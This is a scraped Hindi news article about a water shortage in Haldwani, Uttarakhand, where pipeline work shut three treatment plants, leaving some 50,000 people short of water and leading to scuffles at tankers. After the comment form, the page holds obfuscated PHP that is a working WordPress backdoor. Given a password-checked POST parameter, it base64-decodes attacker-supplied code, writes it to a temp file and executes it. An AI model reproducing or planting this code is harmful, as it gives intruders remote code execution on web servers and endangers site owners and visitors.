Water Crisis: हल्‍द्वानी में 50 हजार लोग पानी के लिए तरसे, जाने पूरा मामला..

Uttarakhand Press 19 June 2023: Water Crisis: नैनीताल रोड में वाक वे माल के समीप देवखड़ी नाले की सफाई एवं पुनर्निर्माण कार्य के तहत जल संस्थान की मुख्य एवं वितरण पाइप लाईनों को शिफ्ट किए जाने का कार्य रविवार को भी जारी रहा।

पेयजल लाइन को शिफ्ट करने के लिए जल संस्थान को शीशमहल में प्लांट नंबर, दो के साथ तीन नंबर प्लांट को भी बंद करना पड़ा। तीन प्लांट के एक साथ बंद हो जाने से शहर की करीब 50 हजार की आबादी को पेयजल संकट से गुजरना पड़ा। हालांकि विभाग ने पेयजल प्रभावित क्षेत्रों में टैंकर भिजवाया लेकिन वह लोगों के लिए काफी नहीं हुआ। कई जगह पर तो पानी भरने को लेकर मारपीट होने तक की नौबत आ गई।

शीशमहल के चार में से तीन प्लांट को बंद:
अधिशासी अभियंता आरएल लोशाली टीम के साथ मौके पर रहकर कार्य करवाते रहे। उन्होंने बताया कि रविवार को पेयजल लाइन शिफ्ट करने के लिए शीशमहल के चार में से तीन प्लांट को बंद करना पड़ा।

जिस कारण नैनीताल रोड के शीशमहल, डिग्री कालेज, नबावी रोड, बद्रीपुरा, मल्ला गोरखपुर, बाजार क्षेत्र, रामपुर रोड, कालाढूंगी रोड, बरेली रोड, राजपुरा, रेलवे बाजार क्षेत्र में 50 हजार से अधिक की आबादी पानी के लिए परेशान रही। देर रात तक लाइन शिफ्टिंग का कार्य पूर्ण कर सप्लाई चालू करने का पूरा प्रयास है।

सोमवार से लोगों को पूर्व की भांति पेयजल मिल सकेगा। पेयजल से प्रभावित क्षेत्रों में मांग के अनुरूप टैंकर भेजे गए है। करीब 30 टैंकरों से पेयजल सप्लाई की गई। जिससे लोगों को पानी की दिक्कत न हो। पेयजल लाइन शिफ्टिंग में एई नीरज तिवारी, जेई सतीश बिष्ट, ठेकेदार खीम सिंह बिष्ट, कर्मचारी हीरा सिंह, कुंदन, सुंदर, नंदू विगत एक सप्ताह से दिन रात से लगे हुए हैं।

टैंकर आते ही 16 क्वाटर में पानी भरने को आए-दिन होती है नोंकझोंक:
गर्मी बढ़ने के साथ पेयजल संकट बढ़ गया है। टनकपुर रोड स्थित 16 क्वार्टर क्षेत्र में लोग विगत छह माह से पानी की समस्या झेल रहे हैं। दो दिन से गौला की सप्लाई बंद होने से आसपास की कालोनी में भी पानी की दिक्कत हो गई जिससे यह स्थिति और भयावह हो गई।

रविवार को भी पानी भरने को मारपीट होने से बच गई। टैंकर के पहुंचते ही लोग खाली बर्तन लेकर एक-दूसरे पर टूट पड़े। वहीं शाह फार्म का नलकूप रविवार को भी ठीक नहीं हो सका। जब इस मामले में जागरण संवाददाता ने संबंधित क्षेत्र के सहायक अभियंता व अवर अभियंता से जानना चाहा तो उन्होंने फोन नहीं उठाया।

Read Previous

Haridwar आढ़त व्यापारी की दुकान की आलमारी से उड़ाए डेढ़ लाख

Read Next

Uttarakhand: मां की गोद से गायब हुआ मासूम, तलाश में पुलिस की चार अलग-अलग टीमें रवाना

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}